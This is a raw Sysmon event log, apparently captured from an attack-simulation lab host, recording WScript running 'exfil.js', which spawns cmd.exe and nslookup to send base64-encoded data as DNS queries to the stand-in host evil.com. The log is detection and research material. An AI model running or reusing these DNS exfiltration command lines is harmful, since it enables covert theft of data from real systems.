14:21:53.307{2E1864BB-1901-629A-9746-000000005F02}75287436C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9646-000000005F02}5332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.305{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9746-000000005F02}7528C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.285{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.285{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.285{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.285{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.285{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9646-000000005F02}5332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.285{2E1864BB-18E0-629A-6742-000000005F02}39765776C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-9646-000000005F02}5332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.298{2E1864BB-1901-629A-9646-000000005F02}5332C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.285{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfiqr.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.238{2E1864BB-1901-629A-9446-000000005F02}14923308C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9546-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.238{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.238{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.223{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.223{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.223{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9546-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.223{2E1864BB-1901-629A-9346-000000005F02}56964768C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-9546-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.234{2E1864BB-1901-629A-9546-000000005F02}3736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-9346-000000005F02}5696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfiqr.tmp 2>&1 10341000x8000000000000000216170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.207{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9446-000000005F02}1492C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.207{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9446-000000005F02}1492C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.205{2E1864BB-1901-629A-9446-000000005F02}14923308C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9346-000000005F02}5696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.185{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9446-000000005F02}1492C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.185{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.185{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.185{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.185{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.185{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9346-000000005F02}5696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.185{2E1864BB-18E0-629A-6742-000000005F02}39764176C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-9346-000000005F02}5696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.188{2E1864BB-1901-629A-9346-000000005F02}5696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfiqr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.185{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljmwl.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.153{2E1864BB-1901-629A-9146-000000005F02}52164908C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9246-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 